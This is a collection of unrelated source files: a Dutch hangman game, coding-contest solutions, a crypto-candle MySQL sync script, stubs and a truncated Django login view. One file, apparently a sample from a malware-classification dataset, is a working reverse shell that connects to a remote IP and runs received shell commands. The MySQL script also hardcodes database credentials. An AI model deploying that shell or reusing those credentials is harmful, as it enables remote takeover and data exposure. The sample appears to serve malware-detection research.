073ae140ad00c7ec2e062e9a960cdce49fe8b96f | e1164e094527d4c987adc9c9147788b0f9ed8af3 | /main.py | 61d3d780e6d7f9dd8110c8b40faaa609f9a2ce7b | [] | no_license | marenthedejong/LaMa-Galgje | d30d5ae9edacbeaf1ee90c4f956f1efa8e8e10b8 | e31f89e291b91af53425c67a28726f4e633de66b | refs/heads/master | 2022-11-12T14:42:09.260316 | 2020-07-03T09:07:58 | 2020-07-03T09:07:58 | 273,059,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | def galgje():
import random
#zorgt dat er een random woord wordt gekozen uit de lijst
words= ['informatica', 'informatiekunde', 'spelletje', 'aardigheidje', 'scholier','fotografie', 'waardebepaling', 'specialiteit', 'verzekering','universiteit','heesterperk']
#alle woorden waar de computer uit kan kiezen
word = random.choice(words)
#definieert wat de variabele 'word' is en laat computer random woord kiezen
print('Welkom bij lama galgje!')
naam = input("Hoe heet je? ")
#vraagt om naam/input gebruiker
def printHallo(naam):
print('Hallo ' + naam + ', veel plezier!')
#gepersonaliseerde welkomsboodschap
printHallo(naam)
print('Je mag geen cijfers invoeren en je mag slechts 1 letter tegelijk raden. Als je een cijfer intoetst gaat dit niet van je beurten af, maar als je meer letters tegelijk probeert te raden gaat er wel een beurt af. Je mag door zolang je nog beurten hebt.')
#spelregels
print('Je hebt 5 beurten! Het woord is', + len(word), 'letters lang')
#geeft weer hoe lang het woord is
guesses = ''
turns = 5
#zorgt dat er max. 5 beurten zijn
guessed =[]
#lijst met (fout) geraden letters
while turns > 0:
#wat er gebeurt als er nog beurten zijn
failed = 0
#aantal keer dat er fouten worden gemaakt
for letter in word:
if letter in guesses:
print(letter)
else:
print("_")
#laat aantal letters zien en de goed geraden letter op de juiste plek
failed +=1
#het aantal fouten neemt met 1 toe
if failed == 0:
print(naam, ', je hebt gewonnen, gefeliciteerd!')
print("Het woord is: ", word)
opnieuw()
#winnaarsbericht en vraag opnieuw te spelen
guess= input("Raad een letter:").lower()
#vraagt om input gebruiker en zorgt dat het niet uitmaakt of het een grote of kleine letter is die wordt ingevoerd
if guess.isnumeric() == True:
print('Je mag geen cijfers gebruiken!')
#zorgt ervoor dat er een foutboodschap komt bij invoer van een getal
guesses += guess
#laat de computer de geraden letter bij de guesses opslaan
if ( guess not in word and guess.isalpha()and len(guess) ==1):
#dus dit gebeurt alleen als de letter niet in het woord zit en dus een letter (en geef cijfer is)
turns -= 1
#aantal beurten neemt met 1 af
print("FOUT")
print("Je hebt nog maar", + turns, 'beurten!')
guessed.append(guess)
guessed.sort()
#zorgt ervoor dat de fout geraden letters in een lijst komen die ook op alfabetische volgorde staat
print('Deze letters zitten niet in het woord:', guessed)
if len(guess) >1 and guess.isalpha():
print('Je mag slechts 1 letter per keer raden!')
turns -= 1
print("Je hebt nog maar", + turns, 'beurten!')
#als de lengte van de invoer langer dan 1 karakter is neemt het aantal beurten met 1 af en wordt er een foutboodschap getoond
if turns == 0:
print(naam,', je hebt verloren, jammer joh!')
print("Het woord is: ", word)
opnieuw()
#verliesbericht voor als beurten op zijn
def opnieuw():
restart = input("Wil je opieuw spelen?").lower()
if restart == 'ja':
galgje()
elif restart == 'nee':
print('Bedankt voor het spelen, tot ziens!')
exit()
#functie voor het opnieuw spelen van het spel, bij ja gaat het spel opnieuw anders stopt het
galgje()
#laat het spel beginnen
| [
"replituser@example.com"
] | replituser@example.com |
5269768f48133f066bb8f41c8cc9fb9b612d37d5 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/keyence2020/C.py | f98ff9ef1e9b01b229f3ad4b4041387f38e11c0f | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | n, k, s = map(int, input().split())
ans = []
for i in range(k):
ans.append(s)
for i in range(n - k):
if s + 1 <= 10 ** 9:
ans.append(s + 1)
else:
ans.append(1)
print(*ans)
| [
"ms.mola1129@gmail.com"
] | ms.mola1129@gmail.com |
309d604e8f4d7daa6c149baff161a6a0f70af028 | 38ba13df9ea6e53c7b924cad1f3bea2de59c7a6a | /nibbler/trading/collectors/testfiles/LINKMAGIC.py | 7312066a4729b9b7734069827034756e0c85723b | [] | no_license | JizzFactoryEmployee/nibblerppman | 0fbc1ce662cf8b4868b41a97291250fae29dc41d | 160e557578a3e8a614450354f6ade233d32b052f | refs/heads/master | 2022-11-14T01:10:31.743000 | 2020-07-04T01:21:52 | 2020-07-04T01:21:52 | 273,835,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | import pymysql
import time
import pandas as pd
from tqdm import tqdm
from datetime import datetime, timedelta
def LINK():
    """Synchronise the local LINK 1-minute candle CSV with the MySQL table.

    Empty table -> bulk LOAD DATA; table shorter than the CSV -> insert
    the missing tail rows; table longer -> wipe it for a fresh reload.
    """
    print('LINKMAGIC START')
    try:
        data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
    #if the file is being populated it wont be found, thus a timeout is needed while it populates
    except FileNotFoundError:
        time.sleep(600)
        data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
    #set up the main connection
    my_conn = pymysql.connect(
        host='nibbler.cxadmpob69hk.ap-southeast-2.rds.amazonaws.com',
        port=3306,
        db='CoinData',
        user='Nibbler',
        password='Nibbler123',
        local_infile=1)
    my_cursor = my_conn.cursor()
    #selecting the last date time value from the database
    my_cursor.execute(''' select count(*) from LINK; ''')
    result = my_cursor.fetchall()
    a = str(result).strip("(,)")
    my_cursor.close()
    # NOTE(review): if int() fails here, `result` stays the raw fetchall
    # tuple and the comparisons below misbehave - confirm intended.
    try:
        result = int((a))
    except ValueError:
        pass
    print('LINK the database length is equal to :',result)
    print('LINK the csv length is equal to:', len(data))
    if result == 0 or result == None:
        print('====LINK DATABASE IS EMPTY TIME TO POPULATE=======')
        my_cursor = my_conn.cursor()
        start1 = time.time()
        #pushing data into the database from the CSV file
        my_cursor.execute(''' LOAD DATA LOCAL INFILE '/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv' IGNORE INTO TABLE LINK
        FIELDS TERMINATED BY ',' ENCLOSED BY '"'
        LINES TERMINATED BY '\n'
        IGNORE 1 LINES;''')
        my_cursor.execute('SHOW WARNINGS')
        my_conn.commit()
        end1 = time.time()
        my_cursor.close()
        my_cursor = my_conn.cursor()
        #getting the length of the database file
        my_cursor.execute(''' select COUNT(*) FROM LINK; ''')
        Clean_results = my_cursor.fetchall()
        Clean_results = str(Clean_results).strip("(,)")
        Clean_results = int(Clean_results)
        my_cursor.close()
        print('total values pushed', Clean_results)
        print('=====PUSHED ENTIRE HISTORY IN:', end1-start1)
        if Clean_results != len(data):
            print('something went wrong, probably a datta error')
    gap = len(data) - result
    if result < len(data) and result > 0:
        print('this means we can a single value or we have a data error')
        #if the result is less than the data by one
        print('gap is equal to', gap,'therefore we need to push', gap, 'points to the database')
        #get the last `gap` candles from the tail of the CSV (negative index)
        x = gap*-1
        to_push = []
        fuckyou = list(range(0,gap))
        for i in fuckyou:
            lastpoints = data.iloc[x][0], data.iloc[x][1], data.iloc[x][2], float(data.iloc[x][3]), float(data.iloc[x][4]), float(data.iloc[x][5]), float(data.iloc[x][6]), float(data.iloc[x][7])
            print(lastpoints)
            to_push.append(lastpoints)
            x = x+1
        y = 0
        # Insert each missing candle row individually.
        for i in to_push:
            pair_1 = to_push[y][0]
            pair_2 = to_push[y][1]
            Date_Time = str(round(to_push[y][2], 0)) #need to change these value to equal that to the databse for each shitcoin
            Open_price = str(round(to_push[y][3], 4))
            High_price = str(round(to_push[y][4], 4))
            Low_price = str(round(to_push[y][5], 4))
            Close_price = str(round(to_push[y][6], 4))
            Volume = str(round(to_push[y][7], 4))
            y = y+1
            start2 = time.time()
            my_cursor = my_conn.cursor()
            my_cursor.execute('INSERT INTO LINK VALUES (%s,%s,%s,%s,%s,%s,%s,%s)', (pair_1, pair_2, Date_Time, Open_price, High_price, Low_price, Close_price, Volume))
            my_conn.commit()
            end2 = time.time()
    if result > len(data):
        print('somLINKing went wrong, database is somehow longer than the csv, deleting all')
        my_cursor = my_conn.cursor()
        my_cursor.execute(''' DELETE FROM LINK; ''')
        my_conn.commit()
        my_cursor.close()
        print('data has been wiped, will repopulate next update')
    if result == len(data):
        print('SAME LENGTH DO NOTHING')
    print('LINKMAGIC DONE')
LINK()
"52958901+JizzFactoryEmployee@users.noreply.github.com"
] | 52958901+JizzFactoryEmployee@users.noreply.github.com |
7ce3e7e2038833d38156599981f270e711b011b1 | f5d4863b6a62ef19ffc98e4f94f6ade1bc8810d3 | /Math/367_Valid_Perfect_Square.py | a0388e81d9425056f254fc88419d9f743ed97c3e | [] | no_license | xiaomojie/LeetCode | 138808eb83938f9bd3c2e8a755d908509dff0fd3 | eedf73b5f167025a97f0905d3718b6eab2ee3e09 | refs/heads/master | 2021-06-12T09:26:01.257348 | 2019-10-23T10:41:06 | 2019-10-23T10:41:06 | 76,184,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | """
求给定的num是否是一个数的平方。
牛顿迭代法求平方根:
设r是函数y=f(x)的根,使用牛顿迭代法,给定一个初始值x0,过x0做切线,y = f(x0) + f'(x0)(x-x0),求
该切线与x轴的交点x1 = x0 - f(x0)/f'(x0),称x1为r的一次近似值,再过(x1,f(x1))做切线。以此循环下去
所以迭代公式为:xn+1 = xn - f(xn)/f'(xn)
对于求平方根,x^2 - n = 0, 可看做函数 f(x) = y = x^2 - n,f'(x) = 2x, 则迭代公式为:
xn+1 = xn - (xn^2 - n)/(2*xn) = xn - xn/2 + n/(2xn) = 1/2(xn + n/xn)
"""
class Solution(object):
    """Decide whether a number is a perfect square, without math.sqrt."""

    def isPerfectSquare1(self, num):
        """
        Integer Newton iteration: start from num and repeatedly take
        guess = (guess + num // guess) // 2 until guess * guess <= num;
        num is a perfect square exactly when the fixed point squares to num.
        """
        guess = num
        while guess * guess > num:
            guess = (guess + num // guess) // 2
        return guess * guess == num

    def isPerfectSquare(self, num):
        """A perfect square is a sum of consecutive odd numbers 1+3+5+7+..."""
        odd = 1
        remaining = num
        while remaining > 0:
            remaining -= odd
            odd += 2
        return remaining == 0
| [
"519399762@qq.com"
] | 519399762@qq.com |
2c0cf2b46fe03109d5b7538f2b181faa0c18b80b | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad190.py | b096d9fe7ec9f3748275958a6e172021d34f49a2 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import subprocess
import hmac
import crypt
import hashlib
import zlib
import lzma
import threading
import bz2
import zipfile
import socket
import tarfile
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
199e2fddf75cc9277b94c8b9a7376bad6d387ac5 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2718/60652/241534.py | 867df002441925aee0423dd0522251ff896ef573 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | l=list("".join(input()))
s= input().replace(',', '').replace('[', '').replace(']', '')
index=0
while index<len(s):
tmp=l[int(s[index])]
l[int(s[index])]=l[int(s[index+1])]
l[int(s[index+1])]=tmp
index+=2
print("".join(str(i) for i in l)) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
4168c9aca8547d6a3efc4a82c8b4fcdd1f820471 | 91365d8ef539a9952f048e1fef03b6f76a0ccf60 | /torch/onnx/_internal/fx/__init__.py | a3037f1cf29a2b678ab4e418fd1c190f9402063f | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | ppwwyyxx/pytorch | 6e68cd816e8197e298c50d7f0e82cc97aff4dbdf | 2883cb464810611c5de37b2ca06771582ddf5f83 | refs/heads/master | 2023-08-10T00:39:48.165007 | 2023-06-07T01:51:59 | 2023-06-07T01:51:59 | 160,557,191 | 3 | 3 | NOASSERTION | 2018-12-05T17:53:38 | 2018-12-05T17:53:37 | null | UTF-8 | Python | false | false | 170 | py | from .context import FxToOnnxContext
from .serialization import save_model_with_external_data
__all__ = [
"save_model_with_external_data",
"FxToOnnxContext",
]
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
368092fc9f933ed1677b7069f0f8572a37fb26ea | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Django_Intro/bin/sqlformat | 65622073bec5cc8bc536e3d99a8912fd7b304755 | [] | no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/jhflorey/Documents/Dojo/Python/Django_Intro/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jhflorey@gmail.com"
] | jhflorey@gmail.com | |
3b0bb11732c17bc4fc7df9419413a488fbd43761 | 149364d3e923ac89990be782a4a8464f4f7f0377 | /number_reader.py | ef7c215a47a06c4bd943587aa979b95b81be8457 | [] | no_license | laboyd001/python-crash-course-ch10 | dec44a1a81dc20931f4cc22e6ab6da0d6716895a | b42aadc9aafc422ffd1e99035c8519cae02ebdba | refs/heads/master | 2020-04-13T20:25:42.502954 | 2018-12-28T16:27:37 | 2018-12-28T16:27:37 | 163,429,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #reads the list back from the json file
import json
filename = 'numbers.json'
with open(filename) as f_obj:
numbers = json.load(f_obj)
print(numbers) | [
"lesley.a.boyd1@gmail.com"
] | lesley.a.boyd1@gmail.com |
99a5ccdf1262a853052de6a1007107d9fb70371e | 3e4c9f69ea13636e2bf8766b3736af373a3c83f6 | /MonoHbb/RunAllRegionUsingFarmOut_wj.py | cf5d8db29d725dda489f493b8ab9557fbeeca3d8 | [] | no_license | ramankhurana/MonoH | c32f44fddb65677d31846ec6aa9c6c0ac0b5877b | 8495336ba22a81858fcaf23a7f4ebd7fc6880985 | refs/heads/master | 2020-04-18T14:41:40.393519 | 2017-08-10T11:16:53 | 2017-08-10T11:16:53 | 67,509,749 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | #!/usr/bin/env python
#from MonoHBranchReader import AnalyzeDataSet, CheckFilter, MakeTable, DeltaR, Phi_mpi_pi
import os
mode='wj'
#inputfilename='NCUGlobalTuples_1.root'
#inputfilename='input.txt'
#outfilename='out.root'
inputfilename = os.environ['INPUT']
outfilename = os.environ['OUTPUT']
if mode == 'signal':
os.system('./MonoHBranchReader.py -m 100.0 -M 150.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 100.0 --MHigh1 150.0 -F ')
if mode == 'signalpSB':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 30.0 --MHigh1 250.0 -F ')
## Mass Sidebands
## inverting the mass cut
if mode == 'zj':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 150.0 --MHigh1 250.0 -F')
##WJets
## 1 additinal lepton
## remove the mass cut
if mode == 'wj':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
##TT
## 1 additional lepton
## >1 additional jets
if mode == 'tt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## TT+WJ
if mode == 'wt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## WJAlphaBet
if mode == 'wjalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
## TTAlphabet
if mode == 'ttalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
##WTAlphabet
if mode == 'wtalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
| [
"raman.khurana@cern.ch"
] | raman.khurana@cern.ch |
c7b276ea5e16b96df513e71b6809af73b654a3e7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_indigent.py | f6376ec43de6ef0c5d00c850cc39f702bc8227fb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
#calss header
class _INDIGENT():
def __init__(self,):
self.name = "INDIGENT"
self.definitions = [u'very poor']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
85f61554cf66fecc3b5b8039b168fd7dffb6a7ef | 38e82df34efcb0ed819f49457210be9616caf875 | /ABC/001/1_b.py | 6bdba55ebd8cc3127a1ca59bbcc6bb1fe74238b8 | [] | no_license | oden6680/AtCoder | 96385ce02ff02909e2f17123dad67d63baa4a0f7 | 3b20885d86726fcf4617076d653abb125609125e | refs/heads/master | 2022-09-19T13:12:02.705304 | 2020-05-31T19:58:51 | 2020-05-31T19:58:51 | 263,191,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | N = int(input())
N = N/1000
if N < 0.1:
vv = 0
elif 0.1 <= N <= 5:
vv = 10 * N
elif 6 <= N <= 30:
vv = N + 50
elif 35 <= N <= 70:
vv = (N-30)/5 + 80
elif N > 70:
vv = 89
print(str(int(vv)).zfill(2)) | [
"oden6680@gmail.com"
] | oden6680@gmail.com |
42520a99c2baa0939e5f98eaaa0557f0cd41267d | 4bc19f4dd098ebedcb6ee78af0ae12cb633671fe | /chat_tornadio/utils.py | 4b8d14624b491fecf606f0044b54b05fb6f57ba5 | [] | no_license | StanislavKraev/rekvizitka | 958ab0e002335613a724fb14a8e4123f49954446 | ac1f30e7bb2e987b3b0bda4c2a8feda4d3f5497f | refs/heads/master | 2021-01-01T05:44:56.372748 | 2016-04-27T19:20:26 | 2016-04-27T19:20:26 | 57,240,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | # -*- coding: utf-8 -*-
import time
def get_cts():
    """Current time as integer ticks of 1/100000 of a second."""
    return int(round(100000 * time.time()))
def cts_from_timedelta(td):
    """Convert a timedelta to 1/100000-second ticks (microseconds are ignored)."""
    whole_seconds = td.days * 86400 + td.seconds
    return whole_seconds * 100000
| [
"kraevst@yandex.ru"
] | kraevst@yandex.ru |
99d9e5dbdc792339e2c8bba2b457342b933a13d6 | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/move_20191127160834.py | d778b2ac46a5923d344172f9540fa2d93731f29a | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | import os, shutil, glob
oldAddres = 'C:/Users/beuo/Downloads/*.xlsx'
newAdress = 'C:/Users/beuo/Documents/Demandas/AtualizaMiddleIntegrationVtex'
shutil.copy(oldAdress, newAdress)
# try:
# os.makedirs(dst_fldr)
# except:
# print("erro")
# for xlsx_file in glob.glob(src_fldr+"//*.xlsx"):
# shutil.copy2(src_fldr,dst_fldr)
| [
"oseiasbeu@outlook.com"
] | oseiasbeu@outlook.com |
2c86b17eb75e0656480c03e3bf0711470a886191 | 6761d430bfa38413985efb319cb02171729f3481 | /indlulamithi/makeorders.py | b447228ba164705bde80fab09cd18d08bb090391 | [
"BSD-3-Clause"
] | permissive | crawfordsm/indlulamithi | b335b469dabefa8b4e1d6dbaafb18eb99c0ee348 | 3d88278f3e7ca5ac46a6bf987eeb475739bd8f22 | refs/heads/master | 2020-12-24T16:05:54.929254 | 2015-01-27T20:41:26 | 2015-01-27T20:41:26 | 29,680,902 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import sys
import os
import numpy as np
from scipy import ndimage as nd
from astropy.io import fits
from astropy import stats
def minflattenimage(data, size=10):
"""Smooth the image and flatten it using the minimum value in the image
Parameters
----------
data: ndarray
image to flatten
size: int
smoothing size for image
Returns
-------
data: ndarray
flattenned image
"""
# flatten image in y direction
m = np.median(data, axis=1)
m = nd.minimum_filter(m, size=size)
m.shape = (len(m), 1)
data = data / m
# flatten image in x direction
m = np.median(data, axis=0)
m = nd.minimum_filter(m, size=size)
data = data / m
return data
def calc_coef(data, xc, yc):
"""Given a position of an order,
determine the equations that defines
its position in the image
"""
yc = int(yc)
cutout = data.copy()
obj, sci_num = nd.label(cutout)
cutout[obj != obj[yc, xc]] = 0
y, x = np.where(cutout > 0)
coef = np.polyfit(x, y, 2)
return cutout, coef
def make_orders(data, xc=680, limit=1.5, image_size=10, order_size=2, outfile=None):
    """Determine coefficients that describe all of the orders in the image.
    Parameters
    ----------
    data: ndarray
       image array with orders in the image
    xc: int
       Column to extract orders from
    limit: float
       Limit for selecting orders in the flattened data
    image_size: int
       Size for minimum filtering of images
    order_size: int
       Size for minimum filtering of orders
    outfile: str or None
       Optional path; when given, each order's y-position and quadratic
       coefficients are also written there, one order per line
    Returns
    -------
    order_dict: dict
       Dictionary with the key representing the y-position of the
       order at xc and containing a list of coefficients describing
       the shape of the order
    """
    # flatten the data
    data = minflattenimage(data, image_size)
    # create a rough image of just the location of the orders
    mask = (data < limit)
    data[mask] = 0
    # clean up the orders and calculate a starting position for each order
    n = nd.minimum_filter(data[:, xc], size=order_size)
    o, num = nd.label(n)
    # NOTE(review): range(1, num) omits label `num`, so the last detected
    # order at column xc is silently dropped -- confirm this is intentional
    # (range(1, num + 1) would include every label).
    pos = nd.center_of_mass(n, o, range(1, num))
    pos = np.array(pos)
    # determine the shape of the orders
    order_dict = {}
    for yc in pos:
        # center_of_mass returns 1-tuples for a 1-D input; unpack the y value
        yc = yc[0]
        cutout, coef = calc_coef(data, xc, yc)
        order_dict[yc] = coef
    if outfile is not None:
        keys = sorted(order_dict.keys())
        fout = open(outfile, 'w')
        for i in keys:
            coef = order_dict[i]
            output = '%i ' % i
            output += ' '.join(['%e' % x for x in coef])
            # only positive y-positions are written out
            if i > 0:
                fout.write(output + '\n')
        fout.close()
    return order_dict
| [
"crawfordsm@gmail.com"
] | crawfordsm@gmail.com |
6fff6f6268ec05e04bfd66704d708b4988f2a055 | b47289da22cab052a5aa86c940ee45073a82edcb | /board/board_config_tmpl.py | 0bc4e4365410ce214346b7805cc4ae67d130f9fa | [
"MIT"
] | permissive | domenc/mqboard | 3195d4d9342f4a2d805fe17f6e22d240af265a7a | 46ccff99ac60f4f2cb892f41f2b5f8d5a1bc59a9 | refs/heads/master | 2022-11-08T05:33:30.286187 | 2020-07-02T06:25:56 | 2020-07-02T06:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | # board_config contains magic strings that don't get published or checked into source control
# kind tells us which type of board this is running, it is used in board to define LED pins
# NOTE: the "<--- UPDATE" markers below make this template intentionally
# non-importable; replace each marked value and delete the marker when
# saving the real board_config.py.
kind = "nodemcu" <--- UPDATE
#kind = "huzzah32"
#kind = "lolin-d32"
#kind = "esp32thing"
#kind = "tinypico"
#kind = "ezsbc"
# location is the system name and is used in mqtt topics, etc
location = "mqtest"
wifi_ssid = "MY-SSID" <--- UPDATE
wifi_pass = "MY-PASSWD" <--- UPDATE
# directories to add to the system search path (after ["", "/lib"]), not applied in safe mode
syspath = ["/src"]
#
# Configuration of loaded modules
#
# The dicts below get passed to the start() function of the modules loaded by main.py.
# The name of each dict must match the name of the module.
mqtt = { # refer to mqtt_async for the list of config options
    "server" : "192.168.0.14", <--- UPDATE
    "ssl_params" : { "server_hostname": "mqtt.example.com" }, <--- UPDATE/REMOVE
    "user" : "esp32/mqtest", <--- UPDATE/REMOVE
    "password" : "00000000000000000000000000000000", <--- UPDATE/REMOVE
    "ssid" : wifi_ssid,
    "wifi_pw" : wifi_pass,
}
# little convenience for demo to support with and without mqtt["user"]
mqtt_prefix = mqtt.get("user", "esp32/" + location)
mqrepl = {
    "prefix" : mqtt_prefix + "/mqb/", # prefix is before cmd/... or reply/...
}
watchdog = {
    "prefix" : mqrepl["prefix"], # must be mqrepl["prefix"]
    "timeout" : 120, # watchdog timeout in seconds, default is 300
    "allok" : 180, # wait time in secs after connection before giving all-OK (no safe mode)
    "revert" : True, # whether to revert from safe mode to normal mode after all-OK time
}
logging = {
    "topic" : mqtt_prefix + "/log",
    "boot_sz" : 10*1024, # large buffer at boot, got plenty of memory then
    "boot_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
    "loop_sz" : 1024, # more moderate buffer once connected
    "loop_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
}
# Modules to load and call start on. For module foo, if this file defines foo then
# foo.start(mqtt, foo) is called, else foo.start(mqtt, {}). If there is no foo.start() then
# that's OK too.
modules = [ "mqtt", "logging", "mqrepl", "watchdog" ]
| [
"tve@voneicken.com"
] | tve@voneicken.com |
aca7f484f5a03a70cba8f08aa9de457a46a307c0 | 6098c4c76b937fe44f941893c6aa6ad4d0412000 | /doug_proj/doug/credentials_template.py | 87f9a3614b60401c316266034e6efb4905579d58 | [] | no_license | kishan/doug | 8979d7fa6885fe143e42c9b7fed024c487ff94ad | 6482b60bc4dcbdf7ac6460db0f3da7c4342482c2 | refs/heads/master | 2021-01-22T05:06:45.557212 | 2017-02-12T23:03:18 | 2017-02-12T23:03:18 | 81,622,898 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # copy template below and save in file called credentials.py
# Placeholder credential store: fill each value with the real secret when
# saving as credentials.py, and keep that populated file out of version control.
CREDENTIALS = {
    "access_token":"",
    "VALIDATION_TOKEN":"",
    "api_key":""
}
"kspatel2018@gmail.com"
] | kspatel2018@gmail.com |
74346e82fb06a0cd34614b8570a7c22230e3218e | 3712a929d1124f514ea7af1ac0d4a1de03bb6773 | /开班笔记/个人项目/果园/project/userinfo/views.py | 1eb53cd0c7dd00a94ef94e8a2ede204e24208a68 | [] | no_license | jiyabing/learning | abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9 | 6059006b0f86aee9a74cfc116d2284eb44173f41 | refs/heads/master | 2020-04-02T20:47:33.025331 | 2018-10-26T05:46:10 | 2018-10-26T05:46:10 | 154,779,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,293 | py | import logging
from django.contrib import messages
from django.contrib.auth.hashers import make_password, check_password
from django.core.exceptions import ObjectDoesNotExist
from django.db import DatabaseError
from django.shortcuts import render, redirect
from userinfo.models import UserInfo
# Create your views here.
# Fixed salt used by make_password/check_password in the views below.
# NOTE(review): a constant salt removes per-user salting -- consider letting
# make_password generate a random salt instead.
auth_check = 'abc'
def login(request):
    """Render the login form page."""
    return render(request, 'login.html')
def login_in(request):
    """Handle a login form POST: authenticate against UserInfo and redirect.

    An unregistered name bounces back to the login page with a flash
    message, a wrong password re-renders the form with an inline error,
    and a successful login redirects to the site root.
    """
    if request.method == 'POST':
        user = UserInfo()
        user.name = request.POST.get('user')
